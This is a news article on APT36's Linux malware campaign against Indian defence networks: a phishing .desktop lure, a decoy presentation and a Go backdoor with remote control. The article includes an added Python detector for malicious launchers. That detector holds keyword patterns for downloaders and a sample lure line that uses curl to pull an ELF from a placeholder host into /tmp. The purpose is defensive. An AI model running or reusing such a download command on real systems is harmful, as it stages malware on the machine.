Are Pakistani Hackers Using Linux Malware To Target India? Here’s the Breakdown
Is it true that Pakistan-linked espionage group APT36 is wreaking havoc on Indian cybersecurity departments? If reports are to be believed, then it may be the case.
Pakistani hacker group APT36 or Transparent Tribe has launched a sophisticated Linux malware attack targeting Indian defence networks powered by BOSS Linux. Interestingly, the malware runs on India’s own Debian-based operating system used across government agencies.
The attack chain was first observed by cybersecurity firm Cyfirma on June 7, 2025. Attackers lure recipients with spear-phishing emails carrying an archive named “Cyber-Security-Advisory.zip.” The archive contains a .desktop shortcut file, a launcher format common on Linux, that performs a dual action once opened.
One, it displays a seemingly harmless PowerPoint document as a decoy. Two, it quietly downloads and executes an ELF binary named client.elf, also known as BOSS.elf, which is written in Go and intended to compromise systems and maintain covert remote access.
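For defenders, the .desktop lure described above can be triaged before anyone opens it. The following is an added example, not code from Cyfirma or from the article: a small Python check that parses a launcher's [Desktop Entry] group and flags Exec= lines that fetch or stage files. The rule set, the sample file contents, the .pptx display name and the example.invalid URL are assumptions constructed for illustration.

```python
import re

# Heuristic rules (assumptions for this example, not vendor signatures): things a
# launcher posing as a document has no reason to carry in its Exec= line.
RULES = {
    "shell-wrapper": re.compile(r"\b(?:ba|da|z)?sh\s+-c\b"),
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "chmod-exec": re.compile(r"\bchmod\s+\+x\b"),
    "temp-path": re.compile(r"/(?:tmp|var/tmp|dev/shm)/"),
    "url": re.compile(r"\b(?:https?|ftp)://", re.I),
}
DOC_NAME = re.compile(r"\.(?:pdf|docx?|pptx?|xlsx?|odt|odp)$", re.I)

def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = (line == "[Desktop Entry]")
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

def findings(text):
    """List the rule names a .desktop file trips; an empty list means no flags."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    hits = [name for name, rx in RULES.items() if rx.search(exec_line)]
    # A launcher (Type=Application) whose display name ends in a document extension
    if entry.get("Type") == "Application" and DOC_NAME.search(entry.get("Name", "")):
        hits.append("document-name-on-launcher")
    return hits

# Constructed samples: a lure shaped like the one described, and a normal launcher.
LURE = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory.pptx
Exec=sh -c "curl -s http://example.invalid/client.elf -o /tmp/client.elf"
"""
BENIGN = """[Desktop Entry]
Type=Application
Name=LibreOffice Impress
Exec=libreoffice --impress %U
"""

if __name__ == "__main__":
    for label, sample in (("lure", LURE), ("benign", BENIGN)):
        print(label, findings(sample))
```

A mail gateway or endpoint job can run a check like this over .desktop files extracted from inbound archives and quarantine any that return findings.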
Analysis shows the ELF malware gathers system metadata such as hostname, CPU, and RAM, and enumerates mounted drives and directories. It logs activity and maintains stealth using obfuscated patterns, allowing real-time control via its C2 channel.
Key functionalities of this Linux malware include screenshot capture, file transfer, remote command execution, and persistent keep-alive communication every 30 seconds.
APT36 has previously been accused of using Windows spyware, phishing macros, and malicious ISOs. The group has accelerated its sophistication throughout 2025. Its previous campaigns employed influenza events and ongoing tensions to deliver phishing via fake government domains, ISO images, and social-engineered PDF lures.
Ever since the nuclear-armed neighbors skirmished in May this year, tensions are high with no diplomatic efforts on the horizon. In times like these, a digital and cyber warzone can create unnecessary nuisance from a defense perspective.

Abdul Wasay explores emerging trends across AI, cybersecurity, startups and social media platforms in a way anyone can easily follow.